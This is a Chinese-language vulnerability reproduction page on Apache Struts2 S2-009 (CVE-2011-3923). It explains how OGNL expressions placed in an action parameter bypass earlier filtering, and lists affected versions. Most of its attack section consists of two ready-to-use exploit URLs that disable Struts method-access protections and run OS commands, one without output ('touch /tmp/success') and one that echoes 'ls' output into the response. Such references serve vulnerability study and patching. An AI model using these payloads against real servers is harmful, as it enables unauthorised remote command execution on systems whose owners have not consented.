menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2011-3923)s2-009 chevron_right (CVE-2011-3923)s2-009.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2011-3923)s2-009.md
    1.58 KB / 2021-07-15 19:48:24
        (CVE-2011-3923)s2-009
    =======================
    
    一、漏洞简介
    ------------
    
    这个漏洞跟s2-003 s2-005 属于一套的。Struts2对s2-003的修复方法是禁止`#`号,于是s2-005通过使用编码`\u0023`或`\43`来绕过;于是Struts2对s2-005的修复方法是禁止`\`等特殊符号,使用户不能提交反斜线。但是,如果当前action中接受了某个参数`example`,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在`example`参数中,然后使用`/HelloWorld.acton?example=&(example)('xxx')=1`的方法来执行它,从而绕过官方对`#`、`\`等特殊字符的防
    
    二、漏洞影响
    ------------
    
    2.1.0 - 2.3.1.1
    
    三、复现过程
    ------------
    
    没回显
    
        /ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec%28%27touch%20/tmp/success%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true
    
    有回显
    
        /ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]
    
    图片.png
    
    
    links
    file_download